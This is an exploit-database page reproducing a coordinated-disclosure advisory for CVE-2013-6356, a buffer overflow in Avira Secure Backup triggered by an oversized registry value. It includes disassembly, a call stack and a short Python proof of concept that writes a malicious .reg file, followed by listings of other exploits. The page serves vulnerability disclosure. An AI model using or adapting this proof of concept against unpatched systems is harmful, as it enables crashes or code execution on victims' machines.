Menu

Search for hundreds of thousands of exploits

"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow"

Author

Exploit author

"Julien Ahrens"

Platform

Exploit platform

windows

Release date

Exploit published date

2013-11-18

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
RCE Security Advisory
http://www.rcesecurity.com
 
 
1. ADVISORY INFORMATION
-----------------------
Product:        Avira Secure Backup
Vendor URL:     www.avira.com
Type:           Improper Restriction of Operations within the Bounds of
a Memory Buffer [CWE-119]
Date found:     2013-10-30
Date published: 2013-11-16
CVSSv2 Score:   4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            CVE-2013-6356
 
 
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
 
 
3. VERSIONS AFFECTED
--------------------
Avira Secure Backup v1.0.0.1 Build 3616
 
 
4. VULNERABILITY DESCRIPTION
----------------------------
A buffer overflow vulnerability has been identified in Avira Secure
Backup v1.0.0.1 Build 3616.
 
The application loads the values of the Registry Keys
"AutoUpdateDownloadFilename" and "AutoUpdateProgressFilename" from
"HKEY_CURRENT_USER\Software\Avira Secure Backup" on startup but does not
properly validate the length of the fetched values before using them in
the further application context, which leads to a buffer overflow
condition with possible persistent code execution. 
 
The application queries the values via a RegQueryValueExW call and a
fixed buffer pointer (lpData) and a fixed buffer size pointer
(lpcbData). If the input string size is greater than the predefined
size, the application uses a second RegQueryValueExW call with the new
buffer size set to the length of the input string, but reuses the
original buffer pointer (lpData), which has not been resized. This
results in overwriting memory space inlcuding SEH - records.
 
An attacker needs to force the victim to import an arbitrary .reg file
in order to exploit the vulnerability. Successful exploits can allow
attackers to execute arbitrary code with the privileges of the user
running the application. Failed exploits will result in a
denial-of-service condition. The attack scenario is persistent, because
the code is executed as long as the manipulated values are loaded into
the Registry. 
 
 
5. DEBUG INFORMATION
--------------------
Call stack of main thread
Address    Returns to   Procedure / arguments       Called
from                  
0012EB48   77DA6F87     <JMP.&ntdll.memmove>        ADVAPI32.77DA6F82
0012EB4C   0012ECBC       dest = 0012ECBC
0012EB50   0015760C       src = 0015760C
0012EB54   00002712       n = 2712 (10002.)
0012EC28   77DA708B     ADVAPI32.77DA6E02           ADVAPI32.77DA7086
0012EC60   0043F15D     Includes ADVAPI32.77DA708B  Avira_Se.0043F15B
0012EC9C   0043F3F8     Avira_Se.0043F0D2           Avira_Se.0043F3F3
0012F5B4   00CC00CC     *** CORRUPT ENTRY ***
 
The vulnerable code part of Avira Secure Backup.exe: 
0043F0D2  PUSH EBP
0043F0D3  MOV EBP,ESP
0043F0D5  SUB ESP,10
0043F0D8  PUSH EBX
0043F0D9  PUSH ESI
0043F0DA  MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>; 
ADVAPI32.RegOpenKeyExW
0043F0E0  PUSH EDI
0043F0E1  LEA EAX,DWORD PTR SS:[EBP-8]
0043F0E4  PUSH EAX                                 ; /pHandle
0043F0E5  PUSH 20019                               ; |Access
0043F0EA  XOR EBX,EBX                              ; |
0043F0EC  PUSH EBX                                 ; |Reserved => 0
0043F0ED  PUSH DWORD PTR SS:[EBP+C]                ; |Subkey
0043F0F0  MOV BYTE PTR SS:[EBP-1],BL               ; |
0043F0F3  PUSH DWORD PTR SS:[EBP+8]                ; |hKey
0043F0F6  MOV DWORD PTR SS:[EBP-C],820             ; |
0043F0FD  CALL ESI                                 ; \RegOpenKeyExW
0043F0FF  MOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>; 
ADVAPI32.RegQueryValueExW
0043F105  TEST EAX,EAX
0043F107  JNZ SHORT Avira_Se.0043F133
0043F109  LEA EAX,DWORD PTR SS:[EBP-C]
0043F10C  PUSH EAX                                 ; /pBufSize
0043F10D  PUSH DWORD PTR SS:[EBP+14]               ; |Buffer
0043F110  LEA EAX,DWORD PTR SS:[EBP-10]            ; |
0043F113  PUSH EAX                                 ; |pValueType
0043F114  PUSH EBX                                 ; |Reserved => NULL
0043F115  PUSH DWORD PTR SS:[EBP+10]               ; |ValueName
0043F118  PUSH DWORD PTR SS:[EBP-8]                ; |hKey
0043F11B  CALL EDI                                 ; \RegQueryValueExW
0043F11D  TEST EAX,EAX 
0043F11F  JNZ SHORT Avira_Se.0043F125
0043F121  MOV BYTE PTR SS:[EBP-1],1
0043F125  PUSH DWORD PTR SS:[EBP-8]                ; /hKey
0043F128  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F12E  CMP BYTE PTR SS:[EBP-1],BL
0043F131  JNZ SHORT Avira_Se.0043F16E
0043F133  LEA EAX,DWORD PTR SS:[EBP-8]
0043F136  PUSH EAX
0043F137  PUSH 20119
0043F13C  PUSH EBX
0043F13D  PUSH DWORD PTR SS:[EBP+C]
0043F140  PUSH DWORD PTR SS:[EBP+8]
0043F143  CALL ESI 
0043F145  TEST EAX,EAX
0043F147  JNZ SHORT Avira_Se.0043F16E
0043F149  LEA EAX,DWORD PTR SS:[EBP-C]
0043F14C  PUSH EAX
0043F14D  PUSH DWORD PTR SS:[EBP+14]
0043F150  LEA EAX,DWORD PTR SS:[EBP-10]
0043F153  PUSH EAX
0043F154  PUSH EBX
0043F155  PUSH DWORD PTR SS:[EBP+10]
0043F158  PUSH DWORD PTR SS:[EBP-8]
0043F15B  CALL EDI 
0043F15D  TEST EAX,EAX
0043F15F  JNZ SHORT Avira_Se.0043F165
0043F161  MOV BYTE PTR SS:[EBP-1],1
0043F165  PUSH DWORD PTR SS:[EBP-8]                ; /hKey
0043F168  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F16E  XOR EAX,EAX
0043F170  CMP BYTE PTR SS:[EBP-1],BL
0043F173  POP EDI
0043F174  POP ESI
0043F175  SETNE AL
0043F178  POP EBX
0043F179  LEAVE
0043F17A  RETN
 
 
6. PROOF-OF-CONCEPT (CODE / EXPLOIT)
------------------------------------
Use the following code to exploit the vulnerability:
 
#!/usr/bin/python
file="poc.reg"
 
junk1="\xCC" * 1240
 
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\Avira Secure Backup]\n"
poc=poc + "\"AutoUpdateProgressFilename\"=\"" + junk1 + "\""
 
try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";
 
 
7. SOLUTION
-----------
Update to v1.0.0.2 Build 3630 or later
 
 
8. REPORT TIMELINE
------------------
2013-10-30: Discovery of the vulnerability
2013-11-03: RCE Security sends first notification to vendor via mail 
            with disclosure date set to 18. November 2013
2013-11-03: MITRE assigns CVE-2013-6356 for this issue
2013-11-04: Vendor ACKs the vulnerability
2013-11-10: RCE Security asks for a status
2013-11-11: Vendor expects to receive a fix the same day
2013-11-13: Vendor releases v1.0.0.2 Build 3630 which fixes CVE-2013-6356
2013-11-16: Coordinated Disclosure
 
 
9. REFERENCES
-------------
http://www.rcesecurity.com/2013/11/cve-2013-6356-avira-secure-backup-v1-0-0-1-buffer-overflow-anatomy-of-a-vulnerability/
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-11-27 "Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF" webapps multiple "Julien Ahrens"
2019-05-14 "Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection" webapps php "Julien Ahrens"
2019-04-10 "Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution" webapps php "Julien Ahrens"
2017-12-26 "Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation" local windows "Julien Ahrens"
2017-10-18 "Check_MK 1.2.8p25 - Information Disclosure" webapps python "Julien Ahrens"
2017-10-13 "AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery" webapps php "Julien Ahrens"
2016-11-22 "AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting" webapps java "Julien Ahrens"
2016-11-21 "Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal" webapps java "Julien Ahrens"
2016-07-13 "Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps xml "Julien Ahrens"
2016-05-23 "XenAPI 1.4.1 for XenForo - Multiple SQL Injections" webapps php "Julien Ahrens"
2016-02-23 "Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery" webapps json "Julien Ahrens"
2014-06-01 "Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP)" remote windows "Julien Ahrens"
2014-03-17 "Free Download Manager - Stack Buffer Overflow" dos windows "Julien Ahrens"
2014-03-09 "GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution" remote windows "Julien Ahrens"
2014-02-20 "VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution" remote windows "Julien Ahrens"
2014-02-19 "VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow" remote windows "Julien Ahrens"
2013-11-30 "Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Local Buffer Overflow (SEH)" local windows "Julien Ahrens"
2013-11-18 "Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow" dos windows "Julien Ahrens"
2013-09-08 "Watchguard Server Center - Local Privilege Escalation" local windows "Julien Ahrens"
2013-07-02 "Winamp 5.63 - Invalid Pointer Dereference" dos windows "Julien Ahrens"
2013-07-02 "Winamp 5.63 - Stack Buffer Overflow" dos windows "Julien Ahrens"
2013-05-04 "ABBS Audio Media Player 3.1 - '.lst' Local Buffer Overflow" local windows "Julien Ahrens"
2013-03-22 "Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Local Privilege Escalation" local windows "Julien Ahrens"
2013-03-04 "HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting" webapps java "Julien Ahrens"
2013-02-23 "Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities" remote windows "Julien Ahrens"
2013-02-15 "Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption" local windows "Julien Ahrens"
2013-01-14 "Serva 2.0.0 - DNS Server QueryName Remote Denial of Service" dos windows "Julien Ahrens"
2013-01-14 "Serva 2.0.0 - HTTP Server GET Remote Denial of Service" dos windows "Julien Ahrens"
2012-11-20 "FormatFactory 3.0.1 - Profile File Handling Buffer Overflow" local windows "Julien Ahrens"
2012-11-12 "Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing" local windows "Julien Ahrens" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected